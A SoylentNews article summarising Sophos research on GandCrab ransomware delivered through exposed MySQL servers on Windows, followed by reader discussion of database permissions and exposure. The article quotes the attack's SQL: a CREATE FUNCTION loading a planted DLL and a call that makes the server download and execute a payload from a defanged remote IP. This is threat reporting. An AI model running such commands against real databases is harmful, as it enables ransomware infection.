Stories
Slash Boxes
Comments

SoylentNews is people

posted by Fnord666 on Monday May 27 2019, @09:13PM   Printer-friendly
from the don't-do-that dept.

Sophos has uncovered a wave of attacks targeting servers running MySQL on Windows.

The attack delivers the GandCrab ransomware.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then, the attacker uses the "set" command to upload all the bytes composing the helper DLL into memory in a variable and wrote out the contents of that variable to a database table named yongger2.

The attacker concatenates the bytes into one file and drops them into the server's plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')

Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.

Tracking back through the attack chain, the researchers determined that the malware was downloaded from the source ~3100 times since mid April. Each download potentially indicating an infection, although presumably some were, as in Sophos' case, honeypots where no actual damage was done. The user interface of the system (geolocated in Arizona) hosting the malware is in simplified Chinese.

While not a widespread attack by numbers, it does represent a significant risk to MySQL databases exposed online.

Detailed Analysis


Original Submission

 
This discussion has been archived. No new comments can be posted.
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
  • (Score: 4, Interesting) by NotSanguine on Monday May 27 2019, @10:00PM (9 children)

    Even so, how does an anonymous connection have the privileges to add and drop tables/functions, *let alone* write data directly to the filesystem?

    I did read TFA and they don't mention any attempts at bypassing authentication. At the same time, the "compromise" of the Sophos MySQL instance wasn't actually on an instance of MySQL. Rather it was a honeypot [wikipedia.org] that just accepted any connections/commands sent to it.

    I'd expect that any MySQL instance that allows such access has either not been secured and/or poor configuration made this possible. Add/drop and filesystem access privilegess on MySQL should be restricted to root and MySQL users *explicitly* granted such privileges.

    I'm glad I don't run MySQL and use MariaDB instead. :)

    --
    No, no, you're not thinking; you're just being logical. --Niels Bohr
    Starting Score:    1  point
    Moderation   +2  
       Interesting=2, Total=2
    Extra 'Interesting' Modifier   0  
    Karma-Bonus Modifier   +1  

    Total Score:   4  
  • (Score: 1, Interesting) by Anonymous Coward on Monday May 27 2019, @10:46PM (5 children)

    by Anonymous Coward on Monday May 27 2019, @10:46PM (#848300)

    Right, among the layers of configuration which are important are those perms.

    But you're overlooking scenarios. Dev DB servers often are more permissive, credentials are sometimes re-used or exposed, etc. This isn't a worm-scale problem. It's escalation. But escalation still matters. This isn't even a bug, really, it's just malware taking advantage of built-in abilities.

    Now, probably 0.01% or fewer MySQL users actually do stuff with filehandles or DLL rebinds from within MySQL, so one might classify those features as bugs - but right now they're documented as features, *for* the <0.01%, because at some point someone wanted them enough to warrant building them.

    And Buzz, I appreciate then sentiment behind

    database servers are on their own internal network. These things can be separated out so that an employee computer as no access whatsoever to other sensitive internal networks.

    but as you're well aware that's normally literally impossible if there's IT staff, since IT staff need a way to repair the machine, and 90%+ odds they can't easily show up and plug into the physical admin port. And developers and DevOps and yadda also often need fingers in pies.

    • (Score: 3, Interesting) by NotSanguine on Monday May 27 2019, @11:03PM (2 children)

      Reasonable points.

      However, under what circumstances is it appropriate to expose TCP/3306 to the Internet on a dev server (or a production server for that matter)?

      I'm sure we both could come up with some *plausible* scenarios where that could happen, but that doesn't make it appropriate or a good idea.

      If we surveyed those who were impacted by this (assuming they would own up to it), I suspect we'd find that the majority were either ignorant or just plain stupid and didn't secure their environments.

      Which reminds me of an incident back in the early 90s, when I was working for a Fortune 50 company that had recently connected their networks to the Internet.

      An employee was (no surprise there) downloading porn from the 'net. But they decided to store their downloaded files on a shared Netware volume. Once the porn was discovered, it was clear who was responsible, as they were the owner of the files.

      The employee was terminated. At the time, I noted that he wasn't fired for downloading porn, he was fired for being stupid.

      This applies in spades here, IMHO.

      --
      No, no, you're not thinking; you're just being logical. --Niels Bohr
      • (Score: 0) by Anonymous Coward on Wednesday May 29 2019, @03:01AM (1 child)

        by Anonymous Coward on Wednesday May 29 2019, @03:01AM (#848753)

        You're totally right that the internet-facing 3306es are stupid misconfiguration. I think we're eye to eye on that.

        But I don't agree about "who were impacted by this" unless you mean by this particular actor under analysis, and not the general vector. The specific actor is just Shodaning for 3360 and taking advantage and you're right, the odds that this is the only insecurity exposed by those machines is nearly nil.

    • (Score: 5, Interesting) by The Mighty Buzzard on Monday May 27 2019, @11:05PM (1 child)

      There's a big difference between giving IT staff full root on every box and every service without authentication and sanity though. Even ultra all-systems, all-services admins shouldn't default to having the keys to the kingdom from logging in to one box. I'd have to authenticate three different ways and ssh in from another SN server to monkey with the SN database with enough perms to do something like this (were we running windows so it was possible) when I've got keys to everything but the money. And we don't even put any serious brain power into figuring out how to better secure things here unless we're just bored and feel like doing so.

      --
      My rights don't end where your fear begins.
      • (Score: 0) by Anonymous Coward on Tuesday May 28 2019, @07:58AM

        by Anonymous Coward on Tuesday May 28 2019, @07:58AM (#848434)

        And we don't even put any serious brain power into figuring out how to better secure things here unless we're just bored and feel like doing so.

        You have to have something in the frist place to put that something into, no?

  • (Score: 0) by Anonymous Coward on Monday May 27 2019, @10:49PM (2 children)

    by Anonymous Coward on Monday May 27 2019, @10:49PM (#848302)

    Well, you see ... it's kind of like this [xkcd.com] ... except not as ripe for memehood.

    • (Score: 2) by NotSanguine on Monday May 27 2019, @11:04PM (1 child)

      Oh the saga of little Bobby Tables!

      It warms the cockles of my heart!

      Pulling shit like that is almost enough for me to want to sire children. :)

      --
      No, no, you're not thinking; you're just being logical. --Niels Bohr
      • (Score: 2, Interesting) by RandomFactor on Tuesday May 28 2019, @09:48PM

        by RandomFactor (3682) Subscriber Badge on Tuesday May 28 2019, @09:48PM (#848676) Journal

        Treasured moments.
        .
        When my daughter got her stereo as a child, I carefully turned it on and listened to it at different volumes and locations, walked around a bit, listened from the other room and finally laid down the law. You must NEVER turn the stereo up to 11.

        It was over ten years before that one came due.
        .
        .
        .
        .
        .
        "My entire life was based on a MEME?!?!"

        --
        В «Правде» нет известий, в «Известиях» нет правды